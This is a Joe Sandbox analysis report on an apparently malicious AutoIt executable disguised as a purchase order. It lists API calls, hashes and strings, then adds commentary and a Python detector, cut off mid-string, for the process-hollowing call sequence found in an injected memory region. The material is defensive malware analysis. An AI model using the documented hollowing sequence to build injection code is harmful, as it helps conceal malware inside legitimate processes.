                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                            • String ID: Line:
                                                            • API String ID: 1874344091-1585850449
                                                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Close$OpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 1607946009-824357125
                                                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03FA1AA3
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FA1B39
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FA1B5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction ID: 0597d246332575d307f9fe41af1ed5bfbe739949a0409308ba2cd7f37211fce6
                                                            • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction Fuzzy Hash: 98620A74A14618DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB390E77A9E81CB59
                                                            APIs
                                                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                            • _free.LIBCMT ref: 004295A0
                                                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 3938964917-1684075321
                                                            • Opcode ID: b0d98879e08f1b192eac1cf85f4636748e7fbbb1ee9accd76bf3b0570c8a299c
                                                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                            • Opcode Fuzzy Hash: b0d98879e08f1b192eac1cf85f4636748e7fbbb1ee9accd76bf3b0570c8a299c
                                                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: Error:
                                                            • API String ID: 4104443479-232661952
                                                            • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                            • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                            • String ID: X$pWH
                                                            • API String ID: 85490731-941433119
                                                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 00401B57
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                            • String ID: @EXITCODE
                                                            • API String ID: 2734553683-3436989551
                                                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                            Strings
                                                            • C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, xrefs: 00410107
                                                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _strcat
                                                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 1765576173-3479207982
                                                            • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                            • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                            • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                            APIs
                                                            Similarity
                                                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1794320848-0
                                                            • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                            • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                            Similarity
                                                            • API ID: Process$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 2429186680-0
                                                            • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                            • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                            • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0043214B
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _malloc.LIBCMT ref: 0043215D
                                                            • _malloc.LIBCMT ref: 0043216F
                                                            Similarity
                                                            • API ID: _malloc$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 680241177-0
                                                            • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                            • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                            APIs
                                                            • _free.LIBCMT ref: 0043210A
                                                              • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                              • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                            • _free.LIBCMT ref: 0043211D
                                                            • _free.LIBCMT ref: 00432130
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                            • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                            • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                            • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 004678F7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                            Similarity
                                                            • API ID: ErrorLast__wsplitpath_malloc
                                                            • String ID:
                                                            • API String ID: 4163294574-0
                                                            • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                            • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                            APIs
                                                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                            • _strcat.LIBCMT ref: 0040F786
                                                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                            • String ID:
                                                            • API String ID: 3199840319-0
                                                            • Opcode ID: c3b864f7d5b9120984dd7626daccb27e52648826fe1c65a593a8dc24c543694e
                                                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                            • Opcode Fuzzy Hash: c3b864f7d5b9120984dd7626daccb27e52648826fe1c65a593a8dc24c543694e
                                                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                            Similarity
                                                            • API ID: FreeInfoLibraryParametersSystem
                                                            • String ID:
                                                            • API String ID: 3403648963-0
                                                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                            • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                            APIs
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            • __lock_file.LIBCMT ref: 00414A8D
                                                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                            • __fclose_nolock.LIBCMT ref: 00414A98
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00415012
                                                            • __ftell_nolock.LIBCMT ref: 0041501F
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2999321469-0
                                                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03FA1AA3
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FA1B39
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FA1B5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction ID: 4158e5e485f7b58deead1930d70c724e06c576ac07fe48ec0a2041755893467c
                                                            • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction Fuzzy Hash: 3412DF24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A4E77A5F81CF5A
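The three calls listed for the function at 03FA1AA3 (CreateProcessW, then Wow64GetThreadContext with ContextFlags 0x10007, which is CONTEXT_FULL on x86, then a 4-byte ReadProcessMemory) are the opening moves of the process-hollowing sequence the report flags in its signatures, and they sit in a region at 03FA0000 that the sandbox marks as not backed by a PE on disk, i.e. injected or unpacked code. The script below is an added example, not part of this Joe Sandbox report or its tooling: it parses function listings in exactly this report format, scores each function against the spawn / thread-context / cross-process-memory triad, and decodes the constants along the way. The helper names are hypothetical, and the embedded input is constructed from the two listings in this report.

```python
"""Flag process-hollowing API sequences in Joe Sandbox function listings.

Added example, not Joe Sandbox code. It parses the "APIs" / "Memory Dump
Source" lines of a function listing and scores each function against the
hollowing sequence the report attributes to this sample.
"""
import re
from dataclasses import dataclass, field

# Constructed input: two function listings copied in the report's own format
# (the hollowing routine at 03FA1AA3 and the Sleep wrapper at 03FA22F9).
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 03FA1AA3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FA1B39
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FA1B5B
Memory Dump Source
• Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
APIs
• Sleep.KERNELBASE(000001F4), ref: 03FA22F9
Memory Dump Source
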